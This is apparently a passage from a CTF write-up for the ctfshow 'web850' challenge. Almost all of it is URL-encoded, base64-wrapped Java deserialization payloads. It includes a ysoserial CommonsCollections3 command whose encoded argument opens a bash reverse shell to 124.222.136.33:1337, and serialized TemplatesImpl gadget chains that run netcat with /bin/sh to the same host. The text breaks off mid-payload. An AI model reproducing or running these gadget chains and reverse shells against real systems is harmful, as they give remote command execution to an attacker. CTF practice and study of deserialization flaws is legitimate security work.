41%41%41%79%41%44%6b%4b%41%41%4d%41%49%67%63%41%4e%77%63%41%4a%51%63%41%4a%67%45%41%45%48%4e%6c%63%6d%6c%68%62%46%5a%6c%63%6e%4e%70%62%32%35%56%53%55%51%42%0a%41%41%46%4b%41%51%41%4e%51%32%39%75%63%33%52%68%62%6e%52%57%59%57%78%31%5a%51%57%74%49%4a%50%7a%6b%64%33%76%50%67%45%41%42%6a%78%70%62%6d%6c%30%50%67%45%41%41%79%67%70%56%67%45%41%42%45%4e%76%5a%47%55%42%41%41%39%4d%61%57%35%6c%0a%54%6e%56%74%59%6d%56%79%56%47%46%69%62%47%55%42%41%42%4a%4d%62%32%4e%68%62%46%5a%68%63%6d%6c%68%59%6d%78%6c%56%47%46%69%62%47%55%42%41%41%52%30%61%47%6c%7a%41%51%41%54%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%0a%62%47%39%68%5a%41%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4e%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%0a%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%37%41%51%41%4a%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%41%51%42%79%4b%45%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%0a%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%31%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%0a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%5a%47%39%6a%64%57%31%6c%62%6e%51%42%41%43%31%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%0a%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%73%42%41%41%68%6f%59%57%35%6b%62%47%56%79%63%77%45%41%51%6c%74%4d%59%32%39%74%4c%33%4e%31%0a%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%0a%4f%77%45%41%43%6b%56%34%59%32%56%77%64%47%6c%76%62%6e%4d%48%41%43%63%42%41%4b%59%6f%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%0a%63%32%78%30%59%79%39%45%54%30%30%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%64%47%56%79%0a%59%58%52%76%63%6a%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%0a%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%61%58%52%6c%63%6d%46%30%62%33%49%42%41%44%56%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%0a%63%6d%35%68%62%43%39%6b%64%47%30%76%52%46%52%4e%51%58%68%70%63%30%6c%30%5a%58%4a%68%64%47%39%79%4f%77%45%41%42%32%68%68%62%6d%52%73%5a%58%49%42%41%45%46%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%0a%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6c%4e%76%64%58%4a%6a%5a%55%5a%70%0a%62%47%55%42%41%41%78%48%59%57%52%6e%5a%58%52%7a%4c%6d%70%68%64%6d%45%4d%41%41%6f%41%43%77%63%41%4b%41%45%41%4d%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%0a%64%48%4d%6b%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%51%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%0a%62%43%39%34%63%32%78%30%59%79%39%79%64%57%35%30%61%57%31%6c%4c%30%46%69%63%33%52%79%59%57%4e%30%56%48%4a%68%62%6e%4e%73%5a%58%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%0a%4f%57%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%55%63%6d%46%75%63%32%78%6c%64%45%56%34%59%32%56%77%64%47%6c%76%0a%62%67%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%42%41%41%67%38%59%32%78%70%62%6d%6c%30%50%67%45%41%45%57%70%68%64%6d%45%76%62%47%46%75%0a%5a%79%39%53%64%57%35%30%61%57%31%6c%42%77%41%71%41%51%41%4b%5a%32%56%30%55%6e%56%75%64%47%6c%74%5a%51%45%41%46%53%67%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%4f%77%77%41%4c%41%41%74%43%67%41%72%0a%41%43%34%42%41%43%4a%75%59%79%41%78%4d%6a%51%75%4d%6a%49%79%4c%6a%45%7a%4e%69%34%7a%4d%79%41%78%4d%7a%4d%33%49%43%31%6c%49%43%39%69%61%57%34%76%63%32%67%67%43%41%41%77%41%51%41%45%5a%58%68%6c%59%77%45%41%4a%79%68%4d%61%6d%46%32%0a%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%73%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%51%63%6d%39%6a%5a%58%4e%7a%4f%77%77%41%4d%67%41%7a%43%67%41%72%41%44%51%42%41%41%31%54%64%47%46%6a%61%30%31%68%63%46%52%68%0a%59%6d%78%6c%41%51%41%66%65%58%4e%76%63%32%56%79%61%57%46%73%4c%31%42%33%62%6d%56%79%4d%54%45%30%4e%7a%51%79%4d%44%45%35%4d%54%45%78%4d%54%41%35%4e%41%45%41%49%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%0a%4d%54%51%33%4e%44%49%77%4d%54%6b%78%4d%54%45%78%4d%44%6b%30%4f%77%41%68%41%41%49%41%41%77%41%42%41%41%51%41%41%51%41%61%41%41%55%41%42%67%41%42%41%41%63%41%41%41%41%43%41%41%67%41%42%41%41%42%41%41%6f%41%43%77%41%42%41%41%77%41%0a%41%41%41%76%41%41%45%41%41%51%41%41%41%41%55%71%74%77%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%43%38%41%44%67%41%41%41%41%77%41%41%51%41%41%41%41%55%41%44%77%41%34%41%41%41%41%41%51%41%54%41%42%51%41%0a%41%67%41%4d%41%41%41%41%50%77%41%41%41%41%4d%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%51%41%44%67%41%41%41%43%41%41%41%77%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%0a%46%67%41%42%41%41%41%41%41%51%41%58%41%42%67%41%41%67%41%5a%41%41%41%41%42%41%41%42%41%42%6f%41%41%51%41%54%41%42%73%41%41%67%41%4d%41%41%41%41%53%51%41%41%41%41%51%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%0a%41%51%41%41%41%44%67%41%44%67%41%41%41%43%6f%41%42%41%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%63%41%42%30%41%41%67%41%41%41%41%45%41%48%67%41%66%41%41%4d%41%47%51%41%41%0a%41%41%51%41%41%51%41%61%41%41%67%41%4b%51%41%4c%41%41%45%41%44%41%41%41%41%43%51%41%41%77%41%43%41%41%41%41%44%36%63%41%41%77%46%4d%75%41%41%76%45%6a%47%32%41%44%56%58%73%51%41%41%41%41%45%41%4e%67%41%41%41%41%4d%41%41%51%4d%41%0a%41%67%41%67%41%41%41%41%41%67%41%68%41%42%45%41%41%41%41%4b%41%41%45%41%41%67%41%6a%41%42%41%41%43%58%56%78%41%48%34%41%47%41%41%41%41%64%54%4b%2f%72%71%2b%41%41%41%41%4d%67%41%62%43%67%41%44%41%42%55%48%41%42%63%48%41%42%67%48%0a%41%42%6b%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%63%65%5a%70%37%6a%78%74%52%78%67%42%41%41%59%38%61%57%35%70%0a%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%59%6d%78%6c%41%51%41%45%0a%64%47%68%70%63%77%45%41%41%30%5a%76%62%77%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4a%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%0a%5a%58%52%7a%4a%45%5a%76%62%7a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%42%6f%42%41%43%4e%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%0a%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%77%45%41%45%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%0a%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%41%49%51%41%43%41%41%4d%41%41%51%41%45%41%41%45%41%0a%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%41%67%41%49%41%41%45%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%0a%41%41%41%38%41%41%34%41%41%41%41%4d%41%41%45%41%41%41%41%46%41%41%38%41%45%67%41%41%41%41%49%41%45%77%41%41%41%41%49%41%46%41%41%52%41%41%41%41%43%67%41%42%41%41%49%41%46%67%41%51%41%41%6c%77%64%41%41%45%55%48%64%75%63%6e%42%33%0a%41%51%42%34%63%33%49%41%45%57%70%68%64%6d%45%75%62%47%46%75%5a%79%35%4a%62%6e%52%6c%5a%32%56%79%45%75%4b%67%70%50%65%42%68%7a%67%43%41%41%46%4a%41%41%56%32%59%57%78%31%5a%58%68%79%41%42%42%71%59%58%5a%68%4c%6d%78%68%62%6d%63%75%0a%54%6e%56%74%59%6d%56%79%68%71%79%56%48%51%75%55%34%49%73%43%41%41%42%34%63%41%41%41%41%41%46%34%0a

web850

java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"|base64

最终payload:

ctfshow=%72%4f%30%41%42%58%4e%79%41%44%4a%7a%64%57%34%75%63%6d%56%6d%62%47%56%6a%64%43%35%68%62%6d%35%76%64%47%46%30%61%57%39%75%4c%6b%46%75%62%6d%39%30%59%58%52%70%62%32%35%4a%62%6e%5a%76%59%32%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6c%58%4b%39%51%38%56%79%33%36%6c%41%67%41%43%54%41%41%4d%62%57%56%74%59%6d%56%79%56%6d%46%73%64%57%56%7a%64%41%41%50%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%4e%59%58%41%37%54%41%41%45%64%48%6c%77%5a%58%51%41%45%55%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%51%32%78%68%63%33%4d%37%65%48%42%7a%66%51%41%41%41%41%45%41%44%57%70%68%64%6d%45%75%64%58%52%70%62%43%35%4e%59%58%42%34%63%67%41%58%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6e%4a%6c%5a%6d%78%6c%59%33%51%75%55%48%4a%76%65%48%6e%68%4a%39%6f%67%7a%42%42%44%79%77%49%41%41%55%77%41%41%57%68%30%41%43%56%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%33%4a%6c%5a%6d%78%6c%59%33%51%76%53%57%35%32%62%32%4e%68%64%47%6c%76%62%6b%68%68%62%6d%52%73%5a%58%49%37%65%48%42%7a%63%51%42%2b%41%41%42%7a%63%67%41%71%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%31%68%63%43%35%4d%59%58%70%35%54%57%46%77%62%75%57%55%67%70%35%35%45%4a%51%44%41%41%46%4d%41%41%64%6d%59%57%4e%30%62%33%4a%35%64%41%41%73%54%47%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%59%32%39%74%62%57%39%75%63%79%39%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%39%55%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6a%74%34%63%48%4e%79%41%44%70%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%51%32%68%68%61%57%35%6c%5a%46%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4d%4d%65%58%37%43%68%36%6c%77%51%43%41%41%46%62%41%41%31%70%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%7a%64%41%41%74%57%30%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%76%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%65%48%42%31%63%67%41%74%57%30%78%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%76%56%59%71%38%64%67%30%47%4a%6b%43%41%41%42%34%63%41%41%41%41%41%4a%7a%63%67%41%37%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%5a%31%62%6d%4e%30%62%33%4a%7a%4c%6b%4e%76%62%6e%4e%30%59%57%35%30%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%59%64%70%41%52%51%51%4b%78%6c%41%49%41%41%55%77%41%43%57%6c%44%62%32%35%7a%64%47%46%75%64%48%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%54%32%4a%71%5a%57%4e%30%4f%33%68%77%64%6e%49%41%4e%32%4e%76%62%53%35%7a%64%57%34%75%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%34%59%57%78%68%62%69%35%70%62%6e%52%6c%63%6d%35%68%62%43%35%34%63%32%78%30%59%79%35%30%63%6d%46%34%4c%6c%52%79%51%56%68%47%61%57%78%30%5a%58%49%41%41%41%41%41%41%41%41%41%41%41%41%41%41%48%68%77%63%33%49%41%50%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%35%6d%64%57%35%6a%64%47%39%79%63%79%35%4a%62%6e%4e%30%59%57%35%30%61%57%46%30%5a%56%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4e%49%76%30%66%36%53%47%30%44%73%43%41%41%4a%62%41%41%56%70%51%58%4a%6e%63%33%51%41%45%31%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%39%69%61%6d%56%6a%64%44%74%62%41%41%74%70%55%47%46%79%59%57%31%55%65%58%42%6c%63%33%51%41%45%6c%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%4e%73%59%58%4e%7a%4f%33%68%77%64%58%49%41%45%31%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%69%61%6d%56%6a%64%44%75%51%7a%6c%69%66%45%48%4d%70%62%41%49%41%41%48%68%77%41%41%41%41%41%58%4e%79%41%44%70%6a%62%32%30%75%63%33%56%75%4c%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%65%47%46%73%59%57%34%75%61%57%35%30%5a%58%4a%75%59%57%77%75%65%48%4e%73%64%47%4d%75%64%48%4a%68%65%43%35%55%5a%57%31%77%62%47%46%30%5a%58%4e%4a%62%58%42%73%43%56%64%50%77%57%36%73%71%7a%4d%44%41%41%5a%4a%41%41%31%66%61%57%35%6b%5a%57%35%30%54%6e%56%74%59%6d%56%79%53%51%41%4f%58%33%52%79%59%57%35%7a%62%47%56%30%53%57%35%6b%5a%58%68%62%41%41%70%66%59%6e%6c%30%5a%57%4e%76%5a%47%56%7a%64%41%41%44%57%31%74%43%57%77%41%47%58%32%4e%73%59%58%4e%7a%63%51%42%2b%41%42%68%4d%41%41%56%66%62%6d%46%74%5a%58%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%30%77%41%45%56%39%76%64%58%52%77%64%58%52%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%64%41%41%57%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%4f%33%68%77%41%41%41%41%41%50%2f%2f%2f%2f%39%31%63%67%41%44%57%31%74%43%53%2f%30%5a%46%57%64%6e%32%7a%63%43%41%41%42%34%63%41%41%41%41%41%4a%31%63%67%41%43%57%30%4b%73%38%78%66%34%42%67%68%55%34%41%49%41%41%48%68%77%41%41%41%47%2b%63%72%2b%75%72%34%41%41%41%41%79%41%44%6b%4b%41%41%4d%41%49%67%63%41%4e%77%63%41%4a%51%63%41%4a%67%45%41%45%48%4e%6c%63%6d%6c%68%62%46%5a%6c%63%6e%4e%70%62%32%35%56%53%55%51%42%41%41%46%4b%41%51%41%4e%51%32%39%75%63%33%52%68%62%6e%52%57%59%57%78%31%5a%51%57%74%49%4a%50%7a%6b%64%33%76%50%67%45%41%42%6a%78%70%62%6d%6c%30%50%67%45%41%41%79%67%70%56%67%45%41%42%45%4e%76%5a%47%55%42%41%41%39%4d%61%57%35%6c%54%6e%56%74%59%6d%56%79%56%47%46%69%62%47%55%42%41%42%4a%4d%62%32%4e%68%62%46%5a%68%63%6d%6c%68%59%6d%78%6c%56%47%46%69%62%47%55%42%41%41%52%30%61%47%6c%7a%41%51%41%54%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4e%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%37%41%51%41%4a%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%41%51%42%79%4b%45%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%31%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%5a%47%39%6a%64%57%31%6c%62%6e%51%42%41%43%31%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%73%42%41%41%68%6f%59%57%35%6b%62%47%56%79%63%77%45%41%51%6c%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6b%56%34%59%32%56%77%64%47%6c%76%62%6e%4d%48%41%43%63%42%41%4b%59%6f%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%45%54%30%30%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%64%47%56%79%59%58%52%76%63%6a%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%61%58%52%6c%63%6d%46%30%62%33%49%42%41%44%56%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%6b%64%47%30%76%52%46%52%4e%51%58%68%70%63%30%6c%30%5a%58%4a%68%64%47%39%79%4f%77%45%41%42%32%68%68%62%6d%52%73%5a%58%49%42%41%45%46%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6c%4e%76%64%58%4a%6a%5a%55%5a%70%62%47%55%42%41%41%78%48%59%57%52%6e%5a%58%52%7a%4c%6d%70%68%64%6d%45%4d%41%41%6f%41%43%77%63%41%4b%41%45%41%4d%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%6b%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%51%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%79%64%57%35%30%61%57%31%6c%4c%30%46%69%63%33%52%79%59%57%4e%30%56%48%4a%68%62%6e%4e%73%5a%58%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%4f%57%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%55%63%6d%46%75%63%32%78%6c%64%45%56%34%59%32%56%77%64%47%6c%76%62%67%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%42%41%41%67%38%59%32%78%70%62%6d%6c%30%50%67%45%41%45%57%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%42%77%41%71%41%51%41%4b%5a%32%56%30%55%6e%56%75%64%47%6c%74%5a%51%45%41%46%53%67%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%4f%77%77%41%4c%41%41%74%43%67%41%72%41%43%34%42%41%47%46%69%59%58%4e%6f%49%43%31%6a%49%48%74%6c%59%32%68%76%4c%46%6c%74%52%6e%70%68%51%30%46%30%59%56%4e%42%4b%30%70%70%51%58%5a%61%52%31%59%79%54%44%4e%53%61%6d%4e%44%4f%48%68%4e%61%6c%46%31%54%57%70%4a%65%55%78%71%52%58%70%4f%61%54%52%36%54%58%6b%34%65%45%31%36%54%54%4e%4a%52%45%45%72%53%6d%70%46%50%58%31%38%65%32%4a%68%63%32%55%32%4e%43%77%74%5a%48%31%38%65%32%4a%68%63%32%67%73%4c%57%6c%39%43%41%41%77%41%51%41%45%5a%58%68%6c%59%77%45%41%4a%79%68%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%73%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%51%63%6d%39%6a%5a%58%4e%7a%4f%77%77%41%4d%67%41%7a%43%67%41%72%41%44%51%42%41%41%31%54%64%47%46%6a%61%30%31%68%63%46%52%68%59%6d%78%6c%41%51%41%66%65%58%4e%76%63%32%56%79%61%57%46%73%4c%31%42%33%62%6d%56%79%4d%54%45%30%4e%44%63%78%4d%6a%51%35%4d%7a%41%32%4d%54%45%34%4d%67%45%41%49%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%4d%54%51%30%4e%7a%45%79%4e%44%6b%7a%4d%44%59%78%4d%54%67%79%4f%77%41%68%41%41%49%41%41%77%41%42%41%41%51%41%41%51%41%61%41%41%55%41%42%67%41%42%41%41%63%41%41%41%41%43%41%41%67%41%42%41%41%42%41%41%6f%41%43%77%41%42%41%41%77%41%41%41%41%76%41%41%45%41%41%51%41%41%41%41%55%71%74%77%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%43%38%41%44%67%41%41%41%41%77%41%41%51%41%41%41%41%55%41%44%77%41%34%41%41%41%41%41%51%41%54%41%42%51%41%41%67%41%4d%41%41%41%41%50%77%41%41%41%41%4d%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%